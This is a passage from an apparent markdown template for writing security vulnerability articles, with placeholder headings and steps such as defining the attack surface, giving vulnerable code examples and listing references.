33 | 2. Define the attack surface
34 | 3. Tell where and why in those places the vulns can appear, how function here works, add charts, add visual support (images, videos, charts) for better understanding
35 | 4. Include examples with vulnerable source code
36 | 5. Is there any detailed case study? Provide the link
37 | 6. Way to identify the issue through the source code
38 | 
39 | ## subcategory #k vulnerability #N
40 | 
41 | If vulnerability has subcategories we can split them into parts, to make it easier for the reader to consume the information, it is for better structuring
42 | 
43 | ## subcategory #k+1 vulnerability #N
44 | 
45 | # Vulnerability #N+1
46 | 
47 | # Links & References
48 | 
49 | 1. link
50 | 2. link
51 | 3. link
52 | 


--------------------------------------------------------------------------------